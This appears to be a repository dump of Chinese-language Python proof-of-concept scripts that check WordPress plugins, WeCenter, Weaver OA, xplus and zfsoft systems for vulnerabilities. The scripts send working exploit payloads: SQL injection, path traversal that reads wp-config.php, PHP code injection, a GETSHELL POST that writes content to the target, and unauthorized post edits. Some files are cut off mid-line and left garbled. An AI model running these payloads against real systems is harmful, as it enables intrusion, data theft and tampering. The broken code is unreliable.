7 | description: fileid参数引起的布尔盲注。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
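class weaver_oa_filedownload_BaseVerify:
    """Check for the Weaver OA E-mobile ``downfile.php`` file-download issue.

    One GET is sent and a 200 reply whose body matches ``No error in ...`` is
    the positive signal.
    """

    def __init__(self, url):
        # Base URL of the target.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # NOTE(review): the original also built
        # self.url + "/E-mobile/Data/downfile.php?url=123" but never requested
        # it; both the probe and the report line use the bare base URL. That
        # behaviour is kept here - confirm which target was intended.
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(self.url, headers=headers, timeout=10, verify=False)
            if req.status_code == 200:
                m = re.search(r'No error in ([^<]+)', req.text)
                if m:
                    cprint("[+]存在泛微OA downfile.php 任意文件下载漏洞...(高危)\tpayload: "+self.url, "red")
                else:
                    cprint("[-]不存在weaver_oa_filedownload漏洞", "white", "on_grey")
            # As in the original, a non-200 reply prints nothing.

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = weaver_oa_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()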
--------------------------------------------------------------------------------
/pocs/wecenter/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/wecenter/__init__.py
--------------------------------------------------------------------------------
/pocs/wecenter/wecenter_topic_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wecenter SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0106369
6 | author: Lucifer
7 | description: 文件explore/UPLOAD/?/topic/ajax/question_list中,参数topic_id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
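class wecenter_topic_id_sqli_BaseVerify:
    """Check for the WeCenter ``question_list`` ``topic_id`` SQL injection.

    One GET is sent; the MD5 of "1234" echoed in the body is the positive marker.
    """

    def __init__(self, url):
        # Base URL of the target; the payload path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/explore/UPLOAD/?/topic/ajax/question_list/type-best&topic_id=1%29UnIoN/**/SeLeCt/**/Md5(1234)%23"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"), the value the injected SELECT should echo.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在wecenter SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在wecenter_topic_id_sqli漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = wecenter_topic_id_sqli_BaseVerify(sys.argv[1])
    testVuln.run()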
--------------------------------------------------------------------------------
/pocs/wordpress/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/wordpress/__init__.py
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_admin_ajax_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress admin-ajax.php任意文件下载
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件admin-ajax.php中,参数img存在任意文件下载漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
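class wordpress_admin_ajax_filedownload_BaseVerify:
    """Check for the Revolution Slider ``revslider_show_image`` file download.

    One GET asks for ``wp-config.php``; both ``DB_NAME`` and ``DB_USER`` in the
    body are required for a positive verdict.
    """

    def __init__(self, url):
        # Base URL of the target; the payload path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"DB_NAME" in req.text and r"DB_USER" in req.text:
                cprint("[+]存在wordpress admin-ajax.php任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在wordpress_admin_ajax_filedownload漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = wordpress_admin_ajax_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()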
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_display_widgets_backdoor.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress display-widgets插件后门漏洞
5 | referer: http://www.nsfocus.com.cn/upload/contents/2017/09/20170915174457_73771.pdf
6 | author: Lucifer
7 | description: wordpress display-widgets Version 2.6.1——Version 2.6.3.1 geolocation.php存在后门。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
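class wordpress_display_widgets_backdoor_BaseVerify:
    """Check whether the Display Widgets ``geolocation.php`` backdoor file is present.

    One GET is sent without following redirects; a bare 200 is the positive
    signal, so a site that answers 200 for unknown paths will be a false positive.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-content/plugins/display-widgets/geolocation.php"
        vulnurl = self.url + payload
        try:
            # allow_redirects=False so a redirect to a catch-all page is not
            # mistaken for the file itself; verify=False is the scanner default.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False, allow_redirects=False)
            if req.status_code == 200:
                cprint("[+]存在wordpress display-widgets插件后门漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在wordpress_display_widgets_backdoor漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = wordpress_display_widgets_backdoor_BaseVerify(sys.argv[1])
    testVuln.run()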
38 |
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_plugin_ShortCode_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress 插件shortcode0.2.3 本地文件包含
5 | referer: https://www.exploit-db.com/exploits/34436
6 | author: Lucifer
7 | description: 文件force-download.php参数file未过滤存在文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_plugin_ShortCode_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payloads = ["/force-download.php?file=force-download.php",
23 | "/wp/wp-content/force-download.php?file=force-download.php",
24 | "/wp-content/force-download.php?file=force-download.php",
25 | "/wp-content/themes/ucin/includes/force-download.php?file=force-download.php",
26 | "/wp-content/uploads/patientforms/force-download.php?file=force-download.php"]
27 | try:
28 | for payload in payloads:
29 | vulnurl = self.url + payload
30 | req = requests.get(vulnurl, headers=headers, timeout=5, verify=False)
31 | if r"可能不存在漏洞", "cyan")
38 |
if __name__ == "__main__":
    # Stand-alone entry point: silence warnings and scan the CLI target.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    wordpress_plugin_ShortCode_lfi_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_plugin_azonpop_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Wordpress AzonPop插件SQL注入
5 | referer: https://cxsecurity.com/issue/WLB-2016010049
6 | author: Lucifer
7 | description: payload:/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/ wp_users
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
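class wordpress_plugin_azonpop_sqli_BaseVerify:
    """Check for the AzonPop ``showpopup.php`` ``popid`` SQL injection.

    One GET is sent; the MD5 of "1234" echoed in the body is the positive marker.
    """

    def __init__(self, url):
        # Base URL of the target; the payload path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null%20/*!00000union*/%20select%201,2,/*!00000gRoup_ConCat(unhex(hex(Md5(1234))),0x3c2f62723e,unhex(hex(Md5(1234))))*/,4,5%20/*!00000from*/%20wp_users"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"), the value the injected SELECT should echo.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在Wordpress AzonPop插件SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在wordpress_plugin_azonpop_sqli漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = wordpress_plugin_azonpop_sqli_BaseVerify(sys.argv[1])
    testVuln.run()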
38 |
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_plugin_mailpress_rce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress 插件mailpress远程代码执行
5 | referer: http://0day5.com/archives/3960
6 | author: Lucifer
7 | description: Mailpress存在越权调用,在不登陆的情况下,可以调用系统某些方法,造成远程命令执行。
8 | '''
9 | import re
10 | import sys
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class wordpress_plugin_mailpress_rce_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | payload = "/wp-content/plugins/mailpress/mp-includes/action.php"
25 | vulnurl = self.url + payload
26 | post_data = {
27 | "action":"autosave",
28 | "id":0,
29 | "revision":-1,
30 | "toemail":"",
31 | "toname":"",
32 | "fromemail":"",
33 | "fromname":"",
34 | "to_list":1,
35 | "Theme":"",
36 | "subject":"",
37 | "html":"",
38 | "plaintext":"",
39 | "mail_format":"standard",
40 | "autosave":1,
41 | }
42 | try:
43 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
44 | start = req.text.find("可能不存在漏洞", "cyan")
57 |
if __name__ == "__main__":
    # Stand-alone entry point: silence warnings and scan the CLI target.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    wordpress_plugin_mailpress_rce_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_restapi_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress rest api权限失效导致内容注入
5 | referer: https://www.t00ls.net/thread-38046-1-1.html
6 | author: Lucifer
7 | description: 篡改文章权限。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
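class wordpress_restapi_sqli_BaseVerify:
    """Check for the WordPress REST API content-injection (permission bypass).

    The first GET lists posts to pick an id; a JSON POST then tries to update
    that post's title. The reply's ``data.status`` is read and anything other
    than 400/401 is reported as vulnerable.
    """

    def __init__(self, url):
        # Base URL of the target; REST paths are appended verbatim.
        self.url = url

    def run(self):
        """Send the two-step probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        headers2 = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
            "Content-Type":"application/json"
        }
        payload = "/index.php/wp-json/wp/v2/posts"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            d = json.loads(req.text)
            # Assumes the listing is a non-empty JSON array of post objects.
            id_code = d[0]['id']
            vulnurl = self.url + "/index.php/wp-json/wp/v2/posts/"+str(id_code)+"?id="+str(id_code)+"a"
            post_data = {
                "title":"81dc9bdb52d04dc20036dbd8313ed055"
            }
            req = requests.post(vulnurl, data=json.dumps(post_data), headers=headers2, timeout=10, verify=False)
            d = json.loads(req.text)
            # NOTE(review): only error replies carry a 'data' object; if the POST
            # succeeds the lookup below raises KeyError and the verdict falls
            # through to the except branch. Kept as in the original - confirm the
            # success-path response shape before relying on this check.
            status = d['data']['status']
            if status not in (401, 400):
                cprint("[+]存在wordpress rest api权限失效导致内容注入漏洞...(高危)\tpayload: "+vulnurl, "red")

            else:
                cprint("[-]不存在wordpress_restapi_sqli漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose (JSON/KeyError/network), but no longer a bare
            # ``except`` so KeyboardInterrupt/SystemExit are not swallowed.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = wordpress_restapi_sqli_BaseVerify(sys.argv[1])
    testVuln.run()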
53 |
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_url_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress插件跳转
5 | referer: unknown
6 | author: Lucifer
7 | description: feed-statistics.php中参数url未经过验证可跳转任意网站。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class wordpress_url_redirect_BaseVerify:
    """Check the wordpress-feed-statistics plugin for an unvalidated ``url`` redirect.

    ``run`` issues one GET to ``feed-statistics.php`` with a fixed, encoded
    ``url`` value and reports the (low-severity) finding when a fixed marker
    string appears in the response body. The HTTP client's default redirect
    handling applies and TLS certificate validation is disabled.

    NOTE(review): the ``url`` value is a hard-coded, encoded address of a
    third-party host, so a positive result depends on that external endpoint
    still serving the marker.
    """

    _UA = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    _PAYLOAD = "/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm"
    _MARKER = "100e8a82eea1ef8416e585433fd8462e"

    def __init__(self, url):
        # Base URL of the site under test.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns nothing."""
        vulnurl = self.url + self._PAYLOAD
        try:
            reply = requests.get(vulnurl, headers={"User-Agent": self._UA}, timeout=10, verify=False)
            self._report(self._MARKER in reply.text, vulnurl)
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

    @staticmethod
    def _report(found, vulnurl):
        """Print the positive or negative verdict for *vulnurl*."""
        if not found:
            cprint("[-]不存在wordpress_url_redirect漏洞", "white", "on_grey")
            return
        cprint("[+]存在wordpress插件跳转漏洞...(低危)\tpayload: "+vulnurl, "blue")
33 |
if __name__ == "__main__":
    # CLI entry: the only argument is the target base URL. All warnings are
    # silenced (presumably to hide the TLS warning that verify=False triggers).
    warnings.filterwarnings("ignore")
    wordpress_url_redirect_BaseVerify(sys.argv[1]).run()
38 |
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_woocommerce_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress 插件WooCommerce PHP代码注入
5 | referer: https://packetstormsecurity.com/files/135000/WordPress-WooCommerce-2.4.12-PHP-Code-Injection.html
6 | author: Lucifer
7 | description: 插件WooCommerce中,参数items_per_page存在PHP代码注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class wordpress_woocommerce_code_exec_BaseVerify:
    """Check a WooCommerce listing page for evaluation of the ``items_per_page`` parameter.

    ``run`` GETs ``/produits/`` with a fixed ``items_per_page`` value and
    reports the finding when the md5(1234) digest appears in the response
    body, i.e. when the server evaluated the parameter rather than echoing
    it. TLS certificate validation is disabled for the request.
    """

    _UA = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    _PAYLOAD = "/produits/?items_per_page=%24%7b%40print(md5(1234))%7d&setListingType=grid"
    _MARKER = "81dc9bdb52d04dc20036dbd8313ed055"

    def __init__(self, url):
        # Base URL of the site under test.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns nothing."""
        vulnurl = self.url + self._PAYLOAD
        try:
            reply = requests.get(vulnurl, headers={"User-Agent": self._UA}, timeout=10, verify=False)
            self._report(self._MARKER in reply.text, vulnurl)
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

    @staticmethod
    def _report(found, vulnurl):
        """Print the positive or negative verdict for *vulnurl*."""
        if not found:
            cprint("[-]不存在wordpress_woocommerce_code_exec漏洞", "white", "on_grey")
            return
        cprint("[+]存在wordpress 插件WooCommerce PHP代码注入漏洞...(高危)\tpayload: "+vulnurl, "red")
33 |
if __name__ == "__main__":
    # CLI entry: the only argument is the target base URL. All warnings are
    # silenced (presumably to hide the TLS warning that verify=False triggers).
    warnings.filterwarnings("ignore")
    wordpress_woocommerce_code_exec_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/xplus/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/xplus/__init__.py
--------------------------------------------------------------------------------
/pocs/xplus/xplus_2003_getshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: xplus npmaker 2003系统GETSHELL
5 | referer: http://www.hackdig.com/?07/hack-5007.htm
6 | author: Lucifer
7 | description: 文件/news/js.php中,参数f_id存在SQL注入。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class xplus_2003_getshell_BaseVerify:
    """Check an xplus npmaker 2003 admin endpoint for unauthenticated page creation.

    ``run`` POSTs a form to ``/www/index.php?mod=admin&con=onepage&act=addpost``
    whose ``onepage[filename]`` is ``php.php;`` and whose ``onepage[name]`` is a
    marker string, then GETs ``/shtml/php.php;.shtml`` and reports the finding
    when that page answers 200 with the marker in its body.

    NOTE(review): this check is not read-only -- on an affected host the POST
    creates content on the target and nothing here removes it. The module
    header's description (an SQL injection in ``/news/js.php``) does not match
    what this class does. TLS certificate validation is disabled.
    """

    _UA = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    _MARKER = "81dc9bdb52d04dc20036dbd8313ed055"
    _ADD_PATH = "/www/index.php?mod=admin&con=onepage&act=addpost"
    _CHECK_PATH = "/shtml/php.php;.shtml"

    def __init__(self, url):
        # Base URL of the site under test.
        self.url = url

    def run(self):
        """Send the two requests and print the verdict; returns nothing."""
        headers = {"User-Agent": self._UA}
        # Key order matters: the dict is echoed via json.dumps in the positive message.
        post_data = {
            "onepage[name]": self._MARKER,
            "onepage[filename]": "php.php;",
            "onepage[content]": "",
            "id": "",
            "onepage_submit": "%CC%E1%BD%BB",
        }
        vulnurl = self.url + self._ADD_PATH
        try:
            requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            check = requests.get(self.url + self._CHECK_PATH, headers=headers, timeout=10, verify=False)
            hit = check.status_code == 200 and self._MARKER in check.text
            if not hit:
                cprint("[-]不存在xplus_2003_getshell漏洞", "white", "on_grey")
            else:
                cprint("[+]存在xplus npmaker 2003系统GETSHELL漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
43 |
if __name__ == "__main__":
    # CLI entry: the only argument is the target base URL. All warnings are
    # silenced (presumably to hide the TLS warning that verify=False triggers).
    warnings.filterwarnings("ignore")
    xplus_2003_getshell_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/xplus/xplus_mysql_mssql_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: xplus通用注入
5 | referer: http://www.hackdig.com/?07/hack-5007.htm
6 | author: Lucifer
7 | description: 对mysql和mssql注入点不同。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class xplus_mysql_mssql_sqli_BaseVerify:
    """Check xplus for two injection signatures (a MySQL and an MSSQL variant).

    ``run`` builds ``vulnurl`` from ``_MYSQL_PAYLOAD`` and GETs it; a response
    containing the md5(1234) digest is reported as the MySQL finding. It then
    GETs ``vulnurl`` a second time (the URL is not rebuilt from
    ``_MSSQL_PAYLOAD``) and reports the MSSQL finding when "GAOJIMicrosoft"
    appears in that response. Both requests disable TLS certificate validation.
    """

    _UA = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    _MYSQL_PAYLOAD = "/www/index.php?mod=admin&con=deliver&act=view&username=809763517&deliId=-32%20UnIoN%20SeLeCt%201,Md5(1234),3,4,5,6,7,8,9,10,11,12,13--"
    _MSSQL_PAYLOAD = "/www/index.php?mod=index&con=Review&act=getallpaper&papertype=scrb%27AnD%20ChAr(71)%252BChAr(65)%252BChAr(79)%252BChAr(74)%252BChAr(73)%252B@@VeRsIon%3E0--"
    _MYSQL_MARKER = "81dc9bdb52d04dc20036dbd8313ed055"
    _MSSQL_MARKER = "GAOJIMicrosoft"

    def __init__(self, url):
        # Base URL of the site under test.
        self.url = url

    def run(self):
        """Send both probes and print a verdict for each; returns nothing."""
        headers = {"User-Agent": self._UA}
        vulnurl = self.url + self._MYSQL_PAYLOAD
        try:
            first = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if self._MYSQL_MARKER not in first.text:
                cprint("[-]不存在xplus_mysql_mssql_sqli漏洞", "white", "on_grey")
            else:
                cprint("[+]存在xplus MYSQL通用注入漏洞...(高危)\tpayload: "+vulnurl, "red")

            # Second request goes to the same vulnurl as the first one.
            second = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if self._MSSQL_MARKER not in second.text:
                cprint("[-]不存在xplus_mysql_mssql_sqli漏洞", "white", "on_grey")
            else:
                cprint("[+]存在xplus MSSQL通用注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
40 |
if __name__ == "__main__":
    # CLI entry: the only argument is the target base URL. All warnings are
    # silenced (presumably to hide the TLS warning that verify=False triggers).
    warnings.filterwarnings("ignore")
    xplus_mysql_mssql_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/zfsoft/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/zfsoft/__init__.py
--------------------------------------------------------------------------------
/pocs/zfsoft/xml/zfsoft_service_stryhm_sqli_false.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='2
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/pocs/zfsoft/xml/zfsoft_service_stryhm_sqli_true.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='1
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/pocs/zfsoft/zfsoft_database_control.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 正方教务系统数据库任意操纵
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 端口211数据可操纵,泄露敏感信息。
8 | '''
9 | import sys
10 | import socket
11 | import warnings
12 | from termcolor import cprint
13 | from urllib.parse import urlparse
14 |
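class zfsoft_database_control_BaseVerify:
    """Report whether the target exposes a TCP listener on the zfsoft database port.

    ``run`` derives a host and port from ``url`` (see ``_parse_target``) and
    attempts a plain TCP connect with a 6 s timeout. A successful connect is
    printed as the finding, any failure as "possibly not vulnerable". Nothing
    is sent on the socket: this is a reachability check only, and a listener
    on the port is taken as evidence of the exposure named in the module
    header -- a plain port scan would give the same answer.
    """

    DEFAULT_PORT = 211

    def __init__(self, url):
        # Either a URL ("http://host[:port]/...") or a bare "host[:port]" string.
        self.url = url

    @classmethod
    def _parse_target(cls, url):
        """Return ``(host, port)`` for *url*; the port defaults to ``DEFAULT_PORT``.

        Anything containing "http" is treated as a URL and its netloc is used;
        otherwise the whole string is the target. In both forms an explicit
        port after the first ":" overrides the default, and a non-numeric port
        falls back to the default instead of raising (the original raised a
        bare ValueError for a non-numeric port in the bare "host:port" form).
        """
        if "http" in url:
            host, _, port_text = urlparse(url).netloc.partition(":")
        else:
            host, _, port_text = url.partition(":")
        port = cls.DEFAULT_PORT
        if port_text:
            try:
                port = int(port_text)
            except ValueError:
                pass
        return host, port

    def run(self):
        """Attempt the TCP connect and print the verdict; returns nothing."""
        host, port = self._parse_target(self.url)
        try:
            # The context manager closes the socket on every path; the original
            # never closed it after a successful connect.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(6)
                s.connect((host, port))
            cprint("[+]存在正方教务系统数据库任意操纵漏洞...(高危)\tpayload: "+host+":"+str(port), "red")
        except (OSError, OverflowError):
            # OSError covers refused/timed-out connects and name resolution
            # failures; OverflowError an out-of-range port number.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")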
46 |
if __name__ == "__main__":
    # CLI entry: the only argument is the target host/URL. All warnings are
    # silenced, matching the other PoC scripts in the package.
    warnings.filterwarnings("ignore")
    zfsoft_database_control_BaseVerify(sys.argv[1]).run()
51 |
--------------------------------------------------------------------------------
/pocs/zfsoft/zfsoft_default3_bruteforce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 正方教务系统default3.aspx爆破页面
5 | referer: http://www.wooyun.org/bugs/WooYun-2013-21692
6 | author: Lucifer
7 | description: 文件default3.aspx页面可爆破。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
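class zfsoft_default3_bruteforce_BaseVerify:
    """Check whether a zfsoft site serves ``default3.aspx`` as a login form without a captcha.

    ``run`` first GETs ``url`` following redirects to learn where the site
    actually lands, derives the ``default3.aspx`` URL from that (see
    ``_default3_url``), and reports the finding when that page answers 200
    with an ASP.NET form (``__VIEWSTATEGENERATOR`` present) and no reference
    to ``CheckCode.aspx``. TLS certificate validation is disabled on both
    requests.
    """

    _UA = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url):
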